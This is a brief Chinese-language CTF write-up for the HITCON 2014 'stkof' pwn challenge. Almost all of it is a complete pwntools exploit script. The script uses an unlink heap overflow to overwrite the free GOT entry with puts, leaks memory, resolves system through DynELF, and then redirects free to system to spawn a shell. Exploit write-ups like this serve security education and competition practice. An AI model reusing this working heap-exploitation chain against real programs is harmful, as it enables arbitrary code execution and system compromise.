writeup hitcon-ctf-2014/stkof
题目:
https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof
漏洞分析可参考:
http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/
使用pwntools,利用unlink漏洞,改写free为puts,实现任意地址泄露。然后使用DynELF找到system,再将free替换为system,执行system(‘/bin/sh’)。
from pwn import *
#context.log_level = 'debug'
sock = process('./stkof')
print proc.pidof(sock)[0]
pause()
def add(len):
sock.sendline('1')
sock.sendline(str(len))
sock.recvn(5)
def edit(index, content):
sock.sendline('2')
sock.sendline(str(index))
sock.sendline(str(len(content)))
sock.send(content)
sock.recvn(3)
def delete(index):
sock.sendline('3')
sock.sendline(str(index))
#leak at least 1 byte then everything is OK
def peek(addr):
edit(2, 'A'*16 + p64(addr))
delete(1)
str = sock.recvuntil('OK\n')
result = str.split('\x0aOK')[0]
if result == '':
return '\x00'
return result
bag = 0x602140
add(0x48) #1
add(0x48) #2
add(0x100-8) #3
add(0x100-8) #4
add(0x100-8) #5
x = bag + 2*8
fd = x - 0x18
bk = x - 0x10
edit(2, p64(0) + p64(0) + p64(fd) + p64(bk) + 'C'*32 + p64(0x40) + '\x00')
delete(3)
sock.recvn(3)
puts_plt = 0x400760
free_got = 0x602018
atoi_got = 0x602088
alarm_got = 0x602048
puts_got = 0x602020
#replace free by puts
edit(2, 'A'*16 + p64(free_got))
edit(1, p64(puts_plt))
d = DynELF(peek, elf=ELF('./stkof'))
system_addr = int(d.lookup('system', 'libc'))
#write /bin/sh
edit(4, '/bin/sh\0')
#replace free by system
edit(2, 'A'*16 + p64(free_got))
edit(1, p64(system_addr))
#call system(/bin/sh)
delete(4)
sock.interactive()